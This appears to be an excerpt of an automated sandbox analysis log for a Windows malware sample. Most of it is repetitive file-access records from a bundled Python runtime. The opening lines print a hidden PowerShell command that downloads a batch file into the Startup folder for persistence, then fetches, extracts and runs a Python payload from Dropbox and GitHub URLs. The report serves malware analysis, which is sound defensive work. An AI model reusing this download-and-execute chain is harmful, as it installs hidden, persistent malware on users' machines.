          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\Public\Document\python.exe "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"
          Source: C:\Users\Public\Document\python.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
          Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://github.com/ty9989/u/raw/main/ud.bat', 'c:\users\user\appdata\roaming\\microsoft\\windows\\start menu\\programs\\startup\\windowssecure.bat'); (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/t3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'c:\\users\\public\\document.zip'); add-type -assemblyname system.io.compression.filesystem; [system.io.compression.zipfile]::extracttodirectory('c:/users/public/document.zip', 'c:/users/public/document'); start-sleep -seconds 1; c:\\users\\public\\document\\python.exe c:\users\public\document\lib\prt.py; remove-item 'c:/users/public/document.zip' -force"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\DLLs VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\__init__.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\__init__.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__ VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\__init__.cpython-310.pyc.1784788834864 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\codecs.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\codecs.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\codecs.cpython-310.pyc.1784788991344 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\aliases.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\aliases.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\aliases.cpython-310.pyc.1784788843952 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\utf_8.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\utf_8.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\utf_8.cpython-310.pyc.1784788844208 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\cp1252.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\cp1252.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\encodings\__pycache__\cp1252.cpython-310.pyc.1784788843056 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\io.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\io.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\io.cpython-310.pyc.1784793694592 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\abc.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\abc.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\abc.cpython-310.pyc.1784793695152 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\site.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\site.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\site.cpython-310.pyc.1784793695488 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\os.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\os.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\os.cpython-310.pyc.1784793695600 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\stat.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\stat.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\stat.cpython-310.pyc.1784793699744 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\_collections_abc.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\_collections_abc.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\_collections_abc.cpython-310.pyc.1784788834736 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\ntpath.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\ntpath.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\ntpath.cpython-310.pyc.1784793705008 VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\genericpath.py VolumeInformation
          Source: C:\Users\Public\Document\python.exe | Queries volume information: C:\Users\Public\Document\Lib\__pycache__\genericpath.cpython-310.pyc VolumeInformation
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\genericpath.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\genericpath.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\genericpath.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\genericpath.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\genericpath.cpython-310.pyc.1784793923120 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_sitebuiltins.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_sitebuiltins.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\_sitebuiltins.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\_sitebuiltins.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_sitebuiltins.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_sitebuiltins.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\_sitebuiltins.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\_sitebuiltins.cpython-310.pyc.1784793920688 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\distutils-precedence.pth VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\_distutils_hack\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc.1784794081312 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\pywin32.pth VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\pythonwin VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc.1784789086448 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\pywin32_system32 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32\lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\pythonwin VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\pythonwin VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\pythonwin VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\pywin32_system32 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\win32 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\site-packages\pythonwin VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\DLLs VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\prt.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\prt.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\prt.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\prt.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\prt.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\re.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\re.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\re.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\re.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\re.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\re.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\re.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\re.cpython-310.pyc.1784793706128 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\enum.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\enum.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\enum.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\enum.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\enum.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\enum.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\enum.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\enum.cpython-310.pyc.1784793708928 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\types.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\types.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\types.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\types.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\types.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\types.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\types.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\types.cpython-310.pyc.1784793709152 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_compile.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_compile.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\sre_compile.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\sre_compile.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_compile.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_compile.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_compile.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\sre_compile.cpython-310.pyc.1784793920048 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_parse.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_parse.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\sre_parse.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\sre_parse.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_parse.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_parse.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_parse.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\sre_parse.cpython-310.pyc.1784793909040 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_constants.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_constants.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\sre_constants.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\sre_constants.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_constants.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_constants.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\sre_constants.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__ VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\sre_constants.cpython-310.pyc.1784793916080 VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\functools.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\functools.py VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\functools.cpython-310.pyc VolumeInformationJump to behavior
          Source: C:\Users\Public\Document\python.exeQueries volume information: C:\Users\Public\Document\Lib\__pycache__\functools.cpython-310.pyc VolumeInformationJump to behavior
